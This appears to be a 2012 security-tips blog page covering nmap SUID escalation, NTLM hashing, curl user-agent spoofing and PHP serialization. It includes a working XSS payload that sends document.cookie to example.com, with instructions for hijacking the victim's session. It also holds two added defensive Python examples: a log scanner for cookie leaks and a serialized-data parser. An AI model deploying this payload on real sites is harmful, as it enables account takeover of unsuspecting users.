If you come across a machine or web app that has nmap with the suid bit set, then the following article will be of interest to you:
http://synfin.net/papers/nmap-suid.txt
Tuesday, October 23, 2012
Friday, October 19, 2012
Mount NTFS ISOs in Linux
http://wiki.edseek.com/guide:mount_loopback#accessing_specific_partitions_in_the_image
watch ALL the things
So I'm waiting for a drive to clone and I like to see both the byte size AND the human-readable byte size. I know you can watch a repeating command using "watch", dur... but two commands at once?
It's actually much simpler than it sounds. All watch does is pass its arguments to 'sh -c'. So, it follows that the following line must work:
watch ls -l file \; ls -lh file
And yes, it does. All you need to do is escape the command terminator ';' so it is passed to watch as an argument instead of ending your own command line.
Now to watch paint dry...
Wednesday, October 17, 2012
OSX Alert Boxes
Found this in a Stack Overflow post; apparently running the following line pops up a box with the specified text:
osascript -e 'tell app "System Events" to display dialog "ZOMGLULZ"'
Monday, October 8, 2012
Actual XSS Impact
Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following JavaScript line will make a GET request to example.com/wut.gif and append document.cookie to the request. You then log into that server, read your Apache logs, and you have that user's cookies. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.
This is an actual attacker's line; don't be stupid.
<script>a = new Image(); a.src = "http://example.com/wut.gif?" + document.cookie + "end"; </script>
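From the defender's side, the tell-tale of the line above is a request whose query string carries URL-encoded document.cookie: session cookie names, and cookie-style "; "-separated pairs, where a query string would normally be "&"-joined. The following is an added example, not code from the post, that runs that heuristic over Apache combined-format log lines (the same check works on any request log you control, such as a forward proxy's). The log lines, the IP addresses and the cookie names in SESSION_NAMES are constructed for the example; extend the name list for your own applications.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# name=value pairs as they look once the URL-encoded query string is decoded.
PAIR_RE = re.compile(r'([A-Za-z_][\w.\-]*)=([^;&\s]+)')
# Cookie names that should never travel in a query string (assumed list for the example).
SESSION_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid",
                 "session", "sid", "token", "auth"}


def inspect_target(target):
    """Return why a request target looks like a cookie leak, or None if it looks normal."""
    path, sep, query = target.partition("?")
    if not sep:
        return None
    decoded = unquote(query)
    pairs = PAIR_RE.findall(decoded)
    leaked = sorted({name.lower() for name, _ in pairs} & SESSION_NAMES)
    if leaked:
        return "session cookie name(s) in query string: " + ", ".join(leaked)
    # document.cookie joins cookies with "; "; a normal query string is "&"-joined.
    if ";" in decoded and len(pairs) >= 2:
        return "cookie-style ';'-separated pairs in query string"
    return None


def scan_log(lines):
    """Parse each combined-format line and collect the ones whose target looks like a leak."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reason = inspect_target(m["target"])
        if reason:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": m["target"].partition("?")[0],
                "referer": m["referer"],  # the page the injected script fired on, if the browser sent it
                "reason": reason,
            })
    return findings


# Constructed sample log: one exfiltration hit between two ordinary requests.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Oct/2012:10:15:02 -0400] "GET /wut.gif?PHPSESSID=3f2a9c1e7b;%20remember=1end HTTP/1.1" 404 209 "http://shop.example/cart" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0"
203.0.113.7 - - [08/Oct/2012:10:15:05 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/15.0"
203.0.113.9 - - [08/Oct/2012:10:16:11 -0400] "GET /search?q=shoes&page=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Macintosh) Safari/536.26"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

The referer field is worth keeping in the finding: it names the page on which the injected script ran, which is where the XSS itself needs fixing. Note that this only catches what is logged; the fix that makes the line above return nothing useful is setting HttpOnly on session cookies, so document.cookie never contains them.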
Labels: Web
Generate NTLM hashes via command line
Turns out the NTLM hashing algorithm is super simple. It just takes the string you give it, converts it to UTF-16LE and then outputs the MD4 of that. You can generate your own fairly simply at the command line:
$ iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
dcc1ed89d1d080ef47dccf3e59a50d45
What this does is use a fairly popular Unix utility, "iconv". -f is the "from" encoding, which in this case is just simple ASCII, and -t sets the "to" encoding. It reads in the string using printf and pipes that to openssl for the digest. The result is the NT hash of the string (or password, if you want to look at it like that) "lolwut".
Create a function and place it in .bashrc:
ntlm_hash () { iconv -f ASCII -t UTF-16LE <(printf '%s' "$1") | openssl dgst -md4; }
Now just type "ntlm_hash lolwut" to get the same result.
Labels: Bash, OSX, Password Cracking, Windows
Stealth cURL
I use curl all the time, almost every day. Unfortunately curl thinks it's a good idea to use its own user-agent string when grabbing content from sites. This is a problem because sometimes devs code in exceptions for different browsers, so the page you get back for Internet Explorer is different from the one you get for Firefox. Luckily, the curl devs included the ability to change your user-agent string to whatever you want.
Normally curl's agent string is this (curl from my MacBook):
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see, it's fairly obvious that the person is on a Mac and they are using curl. To change this user agent so it appears as if Firefox is grabbing it, we use the -A option. First we grab the valid user-agent string we decide to use from http://www.useragentstring.com/. In this case I'm going to use the latest Firefox one; the command line is as follows:
curl -A 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2' example.com
Now if you look at your logs, you will see the User-Agent string reflects the new string.
Note:
curl supports config files using -K, so you can just place it in a file along with whatever else you want to use and reference the config file; a nice example is in the man page.
Wednesday, October 3, 2012
Regex for PHP serialized data
This is the regex string to use when searching through a document for serialized data.
/^(i|s|a|o|d)(.*);/si
I got it from here: http://regex-test.com/library/entry/check_if_serialized/16
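The regex above is a quick first filter: it accepts any string that starts with one of those letters and contains a semicolon, so it also matches plain English. When the question is whether a value really is PHP serialized data, and in particular whether it carries an O: object (the case that matters when reviewing code that unserializes untrusted input), parsing it is more reliable than pattern-matching it. The following is an added example, not from the post or the linked page: a small parser for the PHP serialization format (N, b, i, d, s, a and O) with a strict is_serialized check next to the post's regex. Sample inputs are constructed; the string length check assumes ASCII, since PHP counts bytes.

```python
import re
from dataclasses import dataclass, field

# The post's regex as written: any i/s/a/o/d-initial string containing ';' matches, case-insensitively.
PAGE_REGEX = re.compile(r'^(i|s|a|o|d)(.*);', re.S | re.I)


@dataclass
class PhpObject:
    cls: str                                   # class name PHP will instantiate on unserialize()
    props: dict = field(default_factory=dict)


def _expect(s, pos, token):
    """Require the literal token at pos; return the position after it."""
    if s[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def _read_int(s, pos):
    """Read an integer terminated by ':' (a length or element count)."""
    end = s.index(":", pos)
    return int(s[pos:end]), end + 1


def _parse(s, pos):
    """Parse one value at pos; return (value, position after it)."""
    t = s[pos]
    if t == "N":                               # N;
        return None, _expect(s, pos + 1, ";")
    if t in "bid":                             # b:1;  i:42;  d:1.5;
        pos = _expect(s, pos + 1, ":")
        end = s.index(";", pos)
        raw = s[pos:end]
        value = {"b": lambda r: r == "1", "i": int, "d": float}[t](raw)
        return value, end + 1
    if t == "s":                               # s:5:"hello";  (length is in bytes in PHP)
        n, pos = _read_int(s, _expect(s, pos + 1, ":"))
        pos = _expect(s, pos, '"')
        value = s[pos:pos + n]
        return value, _expect(s, pos + n, '";')
    if t in "aO":                              # a:2:{k;v;k;v;}  O:8:"stdClass":1:{k;v;}
        pos = _expect(s, pos + 1, ":")
        name = None
        if t == "O":
            n, pos = _read_int(s, pos)
            pos = _expect(s, pos, '"')
            name = s[pos:pos + n]
            pos = _expect(s, pos + n, '":')
        count, pos = _read_int(s, pos)
        pos = _expect(s, pos, "{")
        items = {}
        for _ in range(count):
            key, pos = _parse(s, pos)
            value, pos = _parse(s, pos)
            items[key] = value
        pos = _expect(s, pos, "}")
        return (PhpObject(name, items) if t == "O" else items), pos
    raise ValueError(f"unknown type tag {t!r} at offset {pos}")


def unserialize(data: str):
    """Parse a complete serialized value; trailing bytes are an error."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def is_serialized(data: str) -> bool:
    """Strict check: True only if the whole string parses as one PHP value."""
    try:
        unserialize(data)
        return True
    except (ValueError, IndexError, KeyError):
        return False


def contains_object(value) -> bool:
    """True if any nested value is an object, the case to flag when reviewing unserialize() of user input."""
    if isinstance(value, PhpObject):
        return True
    if isinstance(value, dict):
        return any(contains_object(v) for v in value.values())
    return False


if __name__ == "__main__":
    for sample in ('a:1:{i:0;s:3:"foo";}', 'O:8:"stdClass":1:{s:1:"x";i:5;}', "Some text; not serialized"):
        print(repr(sample), bool(PAGE_REGEX.match(sample)), is_serialized(sample))
```

Running the main block shows the difference: the post's regex accepts all three samples, while is_serialized rejects the English sentence, and contains_object singles out the one that would instantiate a class on the PHP side.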
Labels: Programming, Web